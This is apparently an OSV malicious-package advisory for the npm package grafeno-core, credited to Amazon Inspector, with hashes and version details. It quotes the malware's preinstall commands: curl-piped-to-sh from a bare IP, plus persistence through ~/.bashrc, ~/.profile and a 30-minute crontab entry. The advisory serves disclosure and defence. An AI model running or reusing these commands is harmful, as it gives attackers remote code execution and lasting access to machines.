{"id":"MAL-2026-15505","summary":"Malicious code in grafeno-core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (19a2990abd7b4447444a42f96636f738449235f9d8760191978e904d028c759e)\nThe package's preinstall lifecycle script runs `curl -s http://216.126.236.46/x.sh | sh` at npm install time, fetching and executing an attacker-controlled shell payload from a plain-HTTP bare-IP host. The same preinstall appends `curl -s 216.126.236.46/x.sh|sh` to ~/.bashrc and ~/.profile and installs a crontab entry `*/30 * * * * curl -s 216.126.236.46/x.sh|sh`, re-fetching and executing the remote payload every 30 minutes for persistent host access. The advertised entry point index.js is a two-line stub exporting `version` and `init`, with no real functionality — the manifest's preinstall is the entire payload.\n","modified":"2026-08-29T02:30:11.892990991Z","published":"2026-08-28T23:01:19Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.0.0"],"id":"IN-MAL-2026-019058","import_time":"2026-08-28T23:14:35.035864607Z","modified_time":"2026-08-28T23:01:19Z","sha256":"19a2990abd7b4447444a42f96636f738449235f9d8760191978e904d028c759e"},{"versions":["1.0.1"],"id":"IN-MAL-2026-019115","import_time":"2026-08-29T02:22:18.268552772Z","modified_time":"2026-08-29T01:42:47Z","sha256":"3ba74dd8ae36cb8f592f3057a5a3f95ad630576e2cab9b0112fa97d2a773385f","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/grafeno-core/v/1.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/grafeno-core/v/1.0.1"}],"affected":[{"package":{"name":"grafeno-core","ecosystem":"npm","purl":"pkg:npm/grafeno-core"},"versions":["1.0.0","1.0.1"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"98c8a35b063283cf6bcd2734b832d36553d362f1","sha512_sri":"sha512-ulP2ORYh6WeCNcFFfX7U+iT7mO3fXCBJIx2J1Dgyz3Zs0YRUYG2YWhTJzwSYV4RWMD3X5kq+88FWdbB/U+k9cw=="},"filename":"grafeno-core-1.0.0.tgz"}],"evidence_files":[{"sha256":"1a9f49458d23c41471393b78da90a480e5db50e0740d304b7dee890bebfe11f9","tlsh":"7d11bbf0c574eb376ec6727076a40112b7d794553908ec845f8c489eb27b2931eb6c6b","path":"package.json"},{"path":"index.js","sha256":"289476f446b51fe6fb0234c9ce3f9285e1de6466128d897571f33bbd56c76491","tlsh":"e990024175a1b6f705568155a541454767a448843715445c954d665602c1e3d42415c8"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/grafeno-core/MAL-2026-15505.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}